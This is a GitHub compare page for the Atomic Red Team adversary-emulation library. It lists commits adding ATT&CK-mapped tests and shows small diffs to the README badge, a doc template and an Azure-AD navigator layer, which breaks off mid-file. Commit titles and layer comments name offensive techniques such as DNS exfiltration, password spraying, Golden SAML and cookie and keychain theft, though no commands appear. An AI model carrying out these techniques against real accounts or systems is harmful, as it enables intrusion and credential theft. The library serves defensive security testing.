Compare commits

...

117 Commits

Author SHA1 Message Date
Carrie Roberts 861dd0ed00 Update T1572.yaml 2025-03-12 18:04:24 -05:00
Carrie Roberts faa00900b6 Update T1572.yaml 2025-03-12 18:03:56 -05:00
Carrie Roberts 80b3519bf8 Update T1572.yaml 2025-03-12 18:03:20 -05:00
Carrie Roberts d61f0895f7 Merge branch 'master' into cloudlfare-tunnel 2025-03-12 17:02:17 -06:00
Atomic Red Team doc generator f6f89f8ba5 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-12 22:58:52 +00:00
Hare Sudhan 3d289a64b6 Added VSCode tunnel (#3079)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-03-12 17:57:56 -05:00
Atomic Red Team doc generator 44ccc16cc1 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-12 22:54:32 +00:00
Hare Sudhan b5a0dbb0d7 Added devtunnels (#3078)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-03-12 17:53:33 -05:00
Atomic Red Team doc generator 4153ef9287 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-12 22:49:58 +00:00
Hare Sudhan 67003692e2 Remove Launch Daemon test in the user directory. (#3077) 2025-03-12 17:49:03 -05:00
Hare Sudhan 2faedfabb4 add additional options 2025-03-12 02:28:04 -04:00
Hare Sudhan 3d333f230f adding cloudflare tunnel 2025-03-12 02:21:27 -04:00
Atomic Red Team doc generator 1d16e91c58 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-10 21:59:13 +00:00
ryananicholson 82b75e07e4 feat: Add T1046-12 (#3074)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2025-03-10 17:58:19 -04:00
dependabot[bot] 6ccb05dd04 Bump hypothesis from 6.127.6 to 6.128.2 (#3076)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-03-10 14:50:21 -04:00
dependabot[bot] a1730eac33 Bump hypothesis from 6.125.2 to 6.127.1 (#3067)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2025-03-06 20:58:56 -05:00
Atomic Red Team doc generator 75e5f98972 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-06 01:13:48 +00:00
DunderCode 422153bd8e Fix: Get prereq T1562.004 (#3075) 2025-03-05 20:12:57 -05:00
Atomic Red Team doc generator c65cbdf5c7 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-06 00:50:50 +00:00
you8023 4780f20599 Fix: mistake in T1113-9 (#3073)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-03-05 16:49:52 -08:00
dependabot[bot] 918d5a15ae Bump pytest from 8.3.4 to 8.3.5 (#3071)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-03-04 22:33:16 -05:00
dependabot[bot] 6774c419f1 Bump typer from 0.15.1 to 0.15.2 (#3072)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-03-04 20:12:11 -05:00
Atomic Red Team doc generator 726cd7002e Generated docs from job=generate-docs branch=master [ci skip] 2025-03-01 23:55:32 +00:00
Martha Sosa 779d1b0668 Marthajsosa patch 1 (#3069) 2025-03-01 17:54:39 -06:00
Atomic Red Team doc generator 8bc469a357 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-01 23:02:53 +00:00
Thomas ba3d91a29e Update T1219.yaml with Quick assist (#3068)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-03-01 17:02:00 -06:00
Atomic Red Team doc generator e45d7e2891 Generated docs from job=generate-docs branch=master [ci skip] 2025-03-01 22:56:37 +00:00
mthcht 78923faf9b Update T1070.002.md (#3070) 2025-03-01 16:55:42 -06:00
Atomic Red Team doc generator 121413dd3d Generated docs from job=generate-docs branch=master [ci skip] 2025-02-25 19:52:51 +00:00
you8023 b9e0de4837 Fix some mistakes in T1560.002 and T1016.001 (#3056)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-25 11:51:51 -08:00
Atomic Red Team doc generator c313a5a937 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-25 04:35:21 +00:00
Vignesh 1338527365 Added T1095 for Linux (#3063)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-24 20:34:28 -08:00
Atomic Red Team doc generator b2eb35d1c3 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-25 04:28:04 +00:00
Carrie Roberts 07b95063b7 avoid command hanging (#3066)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-24 20:27:13 -08:00
Carrie Roberts 0e97929897 Create T1036.003_masquerading.vbs (#3064)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-24 16:33:22 -08:00
Atomic Red Team doc generator 71ed365f8f Generated docs from job=generate-docs branch=master [ci skip] 2025-02-24 23:53:33 +00:00
Washbear10 787d043f7f Fixes #2967 (#3061)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-24 15:52:35 -08:00
Atomic Red Team doc generator bd71993a47 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-24 23:49:46 +00:00
Carrie Roberts d9fcf12a31 add elevation required (#3065) 2025-02-24 15:48:54 -08:00
Atomic Red Team doc generator 30dd8f5ea7 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-23 15:45:26 +00:00
zoro bb90406df4 Create T1059.010.yaml (#3044)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-02-23 08:44:28 -07:00
Atomic Red Team doc generator 453c17abfb Generated docs from job=generate-docs branch=master [ci skip] 2025-02-21 22:18:28 +00:00
Manuel Kuß ddbb8208cf Update T1136.003.yaml (#3060)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-21 14:17:36 -08:00
Atomic Red Team doc generator 1e2321f434 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-21 22:11:55 +00:00
ryananicholson 27c202f87f feat: T1567.002 test 2 (#3057)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-21 14:10:28 -08:00
Atomic Red Team doc generator 5ede8f21e4 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-13 22:03:40 +00:00
philhagen-rc 318d7bd6f7 fix MD->HTML render for .io site (#3058) 2025-02-13 17:02:44 -05:00
dependabot[bot] 08b4b60c8b Bump hypothesis from 6.125.1 to 6.125.2 (#3055)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-02-10 22:13:45 -05:00
dependabot[bot] ba61ed2ce3 Bump hypothesis from 6.124.7 to 6.125.1 (#3046)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2025-02-07 21:25:56 -05:00
Atomic Red Team doc generator de903f3fdc Generated docs from job=generate-docs branch=master [ci skip] 2025-02-06 19:21:57 +00:00
Tony M Lambert 0a0d065c34 T1005 Test to Copy Apple Notes Databases via AppleScript (#3051)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-06 11:20:54 -08:00
Atomic Red Team doc generator 8eda90a87c Generated docs from job=generate-docs branch=master [ci skip] 2025-02-06 19:16:33 +00:00
Tony M Lambert b34f3d50ff T1539 AppleScript Copying Safari Cookies test (#3050)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-06 11:15:40 -08:00
Atomic Red Team doc generator 8bf6c17fed Generated docs from job=generate-docs branch=master [ci skip] 2025-02-05 22:36:57 +00:00
Carrie Roberts aa84d5dceb Update the ATT&CK Navigator Layers to v16 (#3049) 2025-02-05 17:36:08 -05:00
Atomic Red Team doc generator eca57cfb99 Generated docs from job=generate-docs branch=master [ci skip] 2025-02-05 22:02:34 +00:00
Tony M Lambert faddf2fe1e T1555.001 Copy Keychain via cat (#3048)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-02-05 14:01:29 -08:00
Atomic Red Team doc generator e5d8aec83e Generated docs from job=generate-docs branch=master [ci skip] 2025-02-05 18:52:21 +00:00
Thomas de Brelaz 45db9f2d89 T1046 - added csv option to ip_address parameter to test number 10 (#3047) 2025-02-05 13:51:06 -05:00
Atomic Red Team doc generator dae29f4952 Generated docs from job=generate-docs branch=master [ci skip] 2025-01-28 20:05:24 +00:00
ryananicholson fdd770460e feat: T1648-1 (#3038)
Co-authored-by: Hare Sudhan <code@0x6c.dev>
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-01-28 12:04:30 -08:00
Atomic Red Team doc generator 8248b65cce Generated docs from job=generate-docs branch=master [ci skip] 2025-01-28 05:08:35 +00:00
Hare Sudhan 5bfbca38f0 Added additional tests for Virtualization/Sandbox Evasion: System Checks (#3041)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-01-27 21:07:43 -08:00
Atomic Red Team doc generator d10a13eb17 Generated docs from job=generate-docs branch=master [ci skip] 2025-01-28 05:03:31 +00:00
Hare Sudhan bfdd702717 Remove unused variable (#3040) 2025-01-28 00:02:41 -05:00
dependabot[bot] d88335c091 Bump hypothesis from 6.124.1 to 6.124.7 (#3042)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-01-27 17:04:24 -05:00
dependabot[bot] 6449b9277b Bump hypothesis from 6.123.16 to 6.124.1 (#3039)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-01-21 15:07:04 -05:00
Atomic Red Team doc generator 75fa21076d Generated docs from job=generate-docs branch=master [ci skip] 2025-01-17 22:15:28 +00:00
ryananicholson fd82e0ad35 New Technique: T1651 (#3031)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-01-17 14:14:34 -08:00
Atomic Red Team doc generator 16d170955c Generated docs from job=generate-docs branch=master [ci skip] 2025-01-17 21:20:31 +00:00
Tony M Lambert 546946b08b New T1539 Test for Chrome ABE Bypass via Remote Debugging (#3036) 2025-01-17 16:19:30 -05:00
Atomic Red Team doc generator 059c77f008 Generated docs from job=generate-docs branch=master [ci skip] 2025-01-16 00:41:19 +00:00
dependabot[bot] 818c23bdab Bump hypothesis from 6.123.2 to 6.123.16 (#3035)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-01-15 19:39:59 -05:00
dependabot[bot] 9321718383 Bump ruamel-yaml from 0.18.6 to 0.18.10 (#3032)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2025-01-13 11:02:21 -05:00
Atomic Red Team doc generator 7658865ae1 Generated docs from job=generate-docs branch=master [ci skip] 2025-01-12 22:43:13 +00:00
ryananicholson b1aba20ca4 feat: Added T1595.003 (#3027)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-01-12 17:42:16 -05:00
Atomic Red Team doc generator 908abd7bf6 Generated docs from job=generate-docs branch=master [ci skip] 2025-01-12 22:31:02 +00:00
Badoodish 1790286330 Added two new tests to T1614.001 (#3019)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2025-01-12 17:30:04 -05:00
Atomic Red Team doc generator ccd6146de1 Generated docs from job=generate-docs branch=master [ci skip] 2025-01-07 20:35:45 +00:00
SanSan-monkey 8d13023cc6 New Atomic Test T1547.001.yaml (#3025)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-01-07 12:34:41 -08:00
Atomic Red Team doc generator 6d5f38ebeb Generated docs from job=generate-docs branch=master [ci skip] 2025-01-03 22:28:45 +00:00
ryananicholson 8bf0d8dd69 feat: T1526 discovery (AWS and Azure) (#3023)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2025-01-03 14:27:52 -08:00
dependabot[bot] b7a6dd6c14 Bump hypothesis from 6.123.0 to 6.123.2 (#3021) 2025-01-01 12:30:20 -05:00
dependabot[bot] 12afd8e372 Bump hypothesis from 6.122.3 to 6.123.0 (#3020) 2024-12-23 20:16:03 -05:00
Atomic Red Team doc generator bfcfd561ea Generated docs from job=generate-docs branch=master [ci skip] 2024-12-19 00:43:51 +00:00
lazarg 89ad31cce4 Update T1124.yaml (#3016)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2024-12-18 16:42:42 -08:00
Atomic Red Team doc generator 1f3c2b9c9d Generated docs from job=generate-docs branch=master [ci skip] 2024-12-19 00:41:04 +00:00
lazarg 2d9087901d Update T1082.yaml (#3015)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2024-12-18 16:39:58 -08:00
Atomic Red Team doc generator f477866de4 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-18 16:53:07 +00:00
Retrospected f308db7af9 Fix T1547.001 test b051b3c0-66e7-4a81-916d-e6383bd3a669 by adding /f argument to the reg modification by reg.exe (#3017)
Co-authored-by: Bhavin Patel <bhavin.j.patel91@gmail.com>
2024-12-18 08:52:10 -08:00
Atomic Red Team doc generator f6b46af2f4 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-18 07:26:07 +00:00
ryananicholson 11c88b9835 feat: more cloud credential discovery (#3018) 2024-12-17 23:25:10 -08:00
Atomic Red Team doc generator dda49722d7 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 18:35:39 +00:00
za 6cb8a46876 Fix typo on T1098.md (#2993) 2024-12-11 11:34:41 -07:00
Atomic Red Team doc generator 98513ccc8f Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 01:04:51 +00:00
Nasreddine Bencherchali dd77eab456 Autologger Tampering Atomics (#3014)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 18:03:46 -07:00
Atomic Red Team doc generator b138e9a2e7 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 01:02:29 +00:00
Nasreddine Bencherchali 8a2891aa01 COMPlus_ETWEnabled Atomics (#3010)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 18:01:25 -07:00
Atomic Red Team doc generator 51d195d066 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 00:57:19 +00:00
joaovarelas 998b8ff722 fix T1001.002-1 powershell gen passwords (#3007)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 17:56:27 -07:00
Atomic Red Team doc generator 666c877ffc Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 00:54:14 +00:00
AJ King 6efef030bf Update broken uBlockLite URL (#2999)
Co-authored-by: Hare Sudhan <code@0x6c.dev>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 17:53:20 -07:00
Atomic Red Team doc generator 01e281aad2 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 00:47:02 +00:00
Nasreddine Bencherchali c800c57aab SDDL Tampering Atomics (#3006)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 17:46:01 -07:00
Atomic Red Team doc generator 24d1919fdf Generated docs from job=generate-docs branch=master [ci skip] 2024-12-11 00:37:58 +00:00
Kien Do 78a9b8296e Update T1486.yaml (#3005)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 17:36:53 -07:00
Atomic Red Team doc generator 0e512a6fc1 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-10 23:59:59 +00:00
Nathan 4ea1e37fc1 Expand ESXi-focused Tests (#3004)
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2024-12-10 16:59:07 -07:00
Atomic Red Team doc generator 41884501a7 Generated docs from job=generate-docs branch=master [ci skip] 2024-12-10 23:06:16 +00:00
Burak Karaduman ddaf498575 New Atomic - Clear PowerShell Session History (#3011)
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2024-12-10 18:05:24 -05:00
dependabot[bot] e5cbc11b0b Bump typer from 0.14.0 to 0.15.1 (#3012)
Bumps [typer](https://github.com/fastapi/typer) from 0.14.0 to 0.15.1.
- [Release notes](https://github.com/fastapi/typer/releases)
- [Changelog](https://github.com/fastapi/typer/blob/master/docs/release-notes.md)
- [Commits](https://github.com/fastapi/typer/compare/0.14.0...0.15.1)

---
updated-dependencies:
- dependency-name: typer
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-12-10 17:58:52 -05:00
dependabot[bot] 40e609a607 Bump hypothesis from 6.122.1 to 6.122.3 (#3013)
Bumps [hypothesis](https://github.com/HypothesisWorks/hypothesis) from 6.122.1 to 6.122.3.
- [Release notes](https://github.com/HypothesisWorks/hypothesis/releases)
- [Commits](https://github.com/HypothesisWorks/hypothesis/compare/hypothesis-python-6.122.1...hypothesis-python-6.122.3)

---
updated-dependencies:
- dependency-name: hypothesis
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-12-10 17:56:34 -05:00
dependabot[bot] 8ac5c4f846 Bump pytest from 8.3.3 to 8.3.4 (#3001)
Bumps [pytest](https://github.com/pytest-dev/pytest) from 8.3.3 to 8.3.4.
- [Release notes](https://github.com/pytest-dev/pytest/releases)
- [Changelog](https://github.com/pytest-dev/pytest/blob/main/CHANGELOG.rst)
- [Commits](https://github.com/pytest-dev/pytest/compare/8.3.3...8.3.4)

---
updated-dependencies:
- dependency-name: pytest
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2024-12-02 23:36:10 -05:00
Atomic Red Team doc generator 099182372e Generated docs from job=generate-docs branch=master [ci skip] 2024-12-03 04:24:33 +00:00
Burak Karaduman 3675235b4a New Atomic - Exfiltrate Data using DNS Queries via dig (#2994)
Co-authored-by: Hare Sudhan <code@0x6c.dev>
2024-12-02 23:23:42 -05:00
dependabot[bot] f8b455702b Bump typer from 0.13.1 to 0.14.0 (#3002)
Bumps [typer](https://github.com/fastapi/typer) from 0.13.1 to 0.14.0.
- [Release notes](https://github.com/fastapi/typer/releases)
- [Changelog](https://github.com/fastapi/typer/blob/master/docs/release-notes.md)
- [Commits](https://github.com/fastapi/typer/compare/0.13.1...0.14.0)

---
updated-dependencies:
- dependency-name: typer
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-12-02 23:17:16 -05:00
dependabot[bot] ca98a490d2 Bump hypothesis from 6.119.4 to 6.122.1 (#3003)
Bumps [hypothesis](https://github.com/HypothesisWorks/hypothesis) from 6.119.4 to 6.122.1.
- [Release notes](https://github.com/HypothesisWorks/hypothesis/releases)
- [Commits](https://github.com/HypothesisWorks/hypothesis/compare/hypothesis-python-6.119.4...hypothesis-python-6.122.1)

---
updated-dependencies:
- dependency-name: hypothesis
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-12-02 23:14:57 -05:00
448 changed files with 15796 additions and 1666 deletions
+2 -1
@@ -2,7 +2,8 @@
# Atomic Red Team
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1670-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1717-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team™ is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
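Review bot: the Atomics count in the shields.io badge URL (1670 to 1717) is a hand-edited literal, so it will drift from the real number of tests between runs; since the generate-docs job already walks every atomic, have it rewrite this line (or point the badge at a generated JSON endpoint) instead of relying on someone remembering to bump it. Separately, the hunk header advertises a 7-line to 8-line change and the file summary says +2 -1, but only the badge-line swap is visible here, so the second added line cannot be reviewed from this view.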
+5 -1
@@ -1,7 +1,11 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
<blockquote><%= technique['description'].gsub("%\\<", "%<") %></blockquote>
<blockquote>
<%= technique['description'].gsub("%\\<", "%<") %>
</blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
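Review bot: moving `<blockquote>` onto its own line does not by itself make the Markdown inside it render. In CommonMark, which is what renders the generated .md files on GitHub, a line beginning with `<blockquote>` opens an HTML block that runs until the next blank line, and everything inside it is passed through as raw HTML rather than parsed; kramdown (the usual Jekyll renderer, if that is what the .io site uses) behaves the same unless block-HTML parsing is enabled. To get the description rendered as Markdown on both targets, emit a blank line after `<blockquote>` and another before `</blockquote>`, or drop the HTML and prefix each description line with `> `. The `gsub("%\\<", "%<")` is unchanged and only repairs the ERB-problematic `%<`; the description is still interpolated without HTML escaping, which is acceptable for ATT&CK-sourced text but deserves a comment so nobody later routes untrusted input through this template.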
@@ -1 +1 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure 